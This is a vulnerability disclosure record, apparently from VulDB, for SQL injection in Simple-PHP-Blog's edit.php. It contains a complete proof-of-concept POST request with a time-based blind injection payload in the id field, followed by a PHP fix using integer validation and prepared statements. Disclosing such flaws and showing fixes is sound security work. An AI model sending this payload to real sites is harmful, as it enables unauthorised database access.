| Title | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection |
|---|
| Description | Download and set up this PHP system from https://github.com/Philipinho/Simple-PHP-Blog. In the edit.php file, the id parameter is neither filtered nor cast to an integer type, which makes SQL injection possible.
POC:
POST /edit.php HTTP/1.1
Host: xxxxxxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Edg/x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=lib8291dc1lcn1lh4nrg2d1nti
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

upd=1&id=1+OR+if(length(database())=12,sleep(2),exp(710))--&title=InjectedTitle&description=InjectedDescription&slug=injected-slug
With this POC, time-delay SQL injection can be used to determine the length of the database name. The duration of the delay is three times the value of 'x' in 'sleep(x)'. |
|---|
| Source | ⚠️ https://github.com/woshinenbaba/CVE-/issues/1 |
|---|
| User | xiaofeifei (UID 92996) |
|---|
| Submitted | November 26, 2025 12:35 (5 months ago) |
|---|
| Moderation | December 7, 2025 18:51 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 334669 [Philipinho Simple-PHP-Blog up to 94b5d3e57308bce5dfbc44c3edafa9811893d958 /edit.php SQL injection] |
|---|
| Points | 20 |
|---|
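
One way to close the hole described above, as an added example rather than code from Simple-PHP-Blog: the id is validated as an integer and every value is bound through a prepared statement. The `posts` table, its columns and the `updatePost` helper are assumptions modelled on the form fields in the request; an in-memory SQLite database stands in for the project's database so the block runs offline.

```php
<?php
// Added example, not code from Simple-PHP-Blog. The table name `posts`, its
// columns and the function name are assumptions based on the POST fields above.
declare(strict_types=1);

/**
 * Update a post only if $rawId is a plain positive integer.
 * Returns the number of rows changed, or null if the id was rejected.
 */
function updatePost(PDO $db, string $rawId, string $title, string $description, string $slug): ?int
{
    // Strict integer check: "1 OR if(...)" fails here and never reaches SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Placeholders keep every request value out of the SQL text itself.
    $stmt = $db->prepare(
        'UPDATE posts SET title = :title, description = :description, slug = :slug WHERE id = :id'
    );
    $stmt->bindValue(':title', $title, PDO::PARAM_STR);
    $stmt->bindValue(':description', $description, PDO::PARAM_STR);
    $stmt->bindValue(':slug', $slug, PDO::PARAM_STR);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, description TEXT, slug TEXT)');
$db->exec("INSERT INTO posts VALUES (1, 'First', 'a', 'first'), (2, 'Second', 'b', 'second')");

// The id value from the request above, after URL decoding.
$pocId = '1 OR if(length(database())=12,sleep(2),exp(710))--';

// Rejected by the integer check: no statement is executed for this input.
var_dump(updatePost($db, $pocId, 'InjectedTitle', 'InjectedDescription', 'injected-slug'));
// A well-formed id updates exactly the row it names.
var_dump(updatePost($db, '2', 'Edited', 'c', 'edited'));
// Row 1 is untouched by the rejected request.
var_dump($db->query('SELECT title FROM posts WHERE id = 1')->fetchColumn());
```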